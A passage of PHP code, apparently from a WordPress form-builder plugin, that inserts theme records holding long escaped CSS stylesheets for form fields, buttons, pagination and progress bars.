none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #029A95;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #029A95;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00DAD3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #01B3AD ;\r\n	background: -moz-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #01B3AD ), color-stop(39%, #01CDC6 ), color-stop(100%, #02DED6 ));\r\n	background: -webkit-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -o-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -ms-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\nlinear-gradient(to right, #01B3AD 0%, #01CDC6 39%, #02DED6 100%)\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #029A95;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(21, \'Theme 06 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #BBDBE7;\r\nborder: 1px solid #25A5DF;\r\nmargin-bottom: 10px;\r\ncolor: #25A5DF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #0D66B1;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\nborder: 1px solid #107DAF;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #25A5DF;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #0D66B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #107DAF;\r\n}\r\n.button-submit:hover {\r\n	background: #25A5DF;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #BBDBE7;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0D66B1;\r\n	color: #ffffff;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0176AA ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #0176AA;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #008AFF;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #0073D3 ;\r\n	background: -moz-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0073D3 ), color-stop(39%, #008FE1 ), color-stop(100%, #00A7ED ));\r\n	background: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -o-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\nbackground: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #0176AA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 